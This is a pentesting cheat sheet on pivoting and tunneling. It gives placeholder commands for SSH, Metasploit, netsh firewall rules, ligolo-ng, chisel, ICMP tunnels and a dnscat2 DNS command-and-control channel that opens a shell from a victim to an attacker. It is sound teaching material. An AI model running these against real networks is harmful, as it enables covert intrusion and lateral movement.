Pivoting & Tunneling

Pivoting is moving to other networks through a compromised host to find multiple targets on different network segments and Tunneling is the obfuscation of our actions to avoid detection.

SSH

client: Where the ssh command is executed. server: Target of the ssh connection.

In Windows see %systemdrive%\Windows\System32\OpenSSH (where ssh)

Allows a local client port to be mapped to another port on a certain target reachable by the server.

ssh -N -L [<C_IP>:]<C_PORT>:<S_TRAGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>

(possible to repeat multiple times -L for multiple ports)

Allows a local client port to be mapped to the server. That port will be used as a proxy socks, so packets passing through that port will leave from the server.

ssh -N -D [<C_IP>:]<C_PORT> <S_USER>@<S_IP>

vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>

sudo proxychains[4] <COMMAND>

(ex.. nmap, msfconsole)

Allows a server port to be mapped to the client. That port will be used as a proxy socks, so packets passing through that port will leave from the client.

ssh -N -R [<S_IP>:]<S_PORT> <S_USER>@<S_IP>

Metasploit

Pivoting only inside metasploit. Maps reaching other subnets via meterpreter sessions (via victim hosts).

 post/multi/manage/autoroute  # set network and session

route add <NETWORK> <SESSION>

Or, in Meterpreter:

run autoroute -s <NETWORK>

Pivoting for tools outside metasploit. Allows a local port to be mapped to metasploit. That port will be used as a proxy socks, so packets passing through that port will be handled by the route paths defined in metasploit.

# Set Route

auxiliary/server/socks_proxy   # set vSocks 4a or 5 and PORT

vim etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>

sudo proxychains[4] <COMMAND>

(ex. nmap)

In meterpreter you can define both a Local and a Remote port forwarding (see above ssh).

Local

portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TRAGET_IP>

Remote

portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TRAGET_IP>

Other

Simple Port Forwarding (single-host)

Define the listening port and the destination to rebroadcast to.

socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>

Define the listening port and the destination to rebroadcast to. Requires administrator privileges.

netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>

netsh.exe interface portproxy del v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0

To view

netsh.exe interface portproxy show [v4tov4 or all]

N.B. create a hole in the firewall if there is one

netsh.exe advfirewall firewall add rule name="<NAME_RULE>" protocol=TCP dir=in localip=<IP> localport=<PORT> action=allow

netsh.exe advfirewall firewall delete rule name="<NAME_RULE>"

sshutle

It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.

sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK>

<COMMAND_TO_NETWORK>

NO proxychains, but root on the SSH client and Python3 on the SSH server.

Plink

On Windows before OpenSSH, PuTTY and its command-line-only counterpart Plink were used. Plink has much of the functionality offered by ssh.

plink.exe -ssh -R <PORT>:<IP>:<PORT> <USER>@<IP>

Tunneling

ligolo-ng

apt install ligolo-ng

Proxy on Attacker machine. Agent on Victim machine.

sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > help

Connect the victim to the server

> sessions
> autoroute

Ligolo-ng < v0.6

sudo ./proxy -selfcert [-laddr <MY_IP>:<MY_PORT>]
# See ATTACKER_IP ATTACKER_PORT
# > help

Create a tun interface on the Proxy Server (C2)

sudo ip tuntap add user <your_username> mode tun ligolo
sudo ip link set ligolo up

Connect the victim to the server and select the session

> sessions
> <ID>
> ifconfig

Setup routing

sudo ip route add <ROUTE/MASK> dev ligolo

> start [--tun <NAME_TUN>]
> stop

Ligolo-ng >= v0.6

sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > help

Create a tun interface on the Proxy Server (C2)

> interface_create --name "<NAME>"

Connect the victim to the server and select the session

> session
> <ID>
> ifconfig

Start the tunneling

> tunnel_start --tun <NAME>

Setup routing

> interface_add_route --name <NAME> --route <ROUTE/MASK>

PROXY --> AGENT1 --> AGENT2 --> ?

You can listen to ports on the agent and redirect connections to your control/proxy server.

listener_add --addr <AGENT_IP>:<AGENT_PORT> --to <PROXY_IP>:<PROXY_PORT> --tcp

> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Useful when we need to set up a reverse shell or something else from the second target (AGENT2) in the network that is not directly reachable.

If we want to do another pivoting from the second target machine (AGENT2), we just need to load the agent, reconnect to the proxy server via the set listener, set new tun (ex. ligolo2) and add routing (see here).

chisel

It performs TCP/UDP pivoting and tunneling, transported over HTTP and encrypted internally via SSH. Being hidden under HTTP it can bypass some restrictions.

On Attacker

chisel server -p <PORT> --reverse --socks5

On Target

chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]

<REMOTE>:

<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>

dnscat2

DNS-based encrypted command-and-control channel. A dnscat2 server runs on an authoritative name server for a particular domain (or as in our case a dummy dns server is created) while the client, configured to run queries on that domain, runs on the compromised machine.

On Attacker (Server)

sudo apt install dnscat2

sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# Memorize secret <SECRET>

On Target (Client)

Download compiled from HERE

./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>

Or with Windows PowerShell Script

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd

Once connected, from Attacker

?     
<COMMAND> --help
windows         # see connections ID
window -i <ID>  # shell

ptunnel-ng

Communication channel encapsulated in ICMP packets. Requires administrator privileges.

Installation

.exe for Windows HERE

git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd src

On Target (Server)

sudo ./ptunnel-ng -r<SERVER_IP> -R22

On Attacker (Client)

sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22

ssh -p2222 -l<USER> <IP>

SocksOverRDP

Allows tunnelling and pivoting between Windows systems via RDP. Requires administrator privileges.

On Attacker (Client), with System PowerShell

regsvr32.exe SocksOverRDP-Plugin.dll

mstsc.exe # Connect on target1

Download Proxifier, portable version (like proxychains but for windows).

Set new proxy server socks5 to 127.0.0.1:1080

On Target1, with System PowerShell

SocksOverRDP-Server.exe

On Attacker

mstsc.exe # Connect on target1 via Target1 pivoting

Warning

With proxychains only full TCP connect scan (nmap -sT)
Windows Defender blocks ICMP, traditional ping (nmap -Pn)

Last updated 11 days ago

hashtagSSH

hashtagMetasploit

hashtagOther

hashtagSimple Port Forwarding (single-host)

hashtagsshutlearrow-up-right

hashtagPlinkarrow-up-right

hashtagTunneling

hashtagligolo-ngarrow-up-right

hashtagchiselarrow-up-right

hashtagdnscat2arrow-up-right

hashtagptunnel-ngarrow-up-right

hashtagSocksOverRDParrow-up-right

hashtagWarning

SSH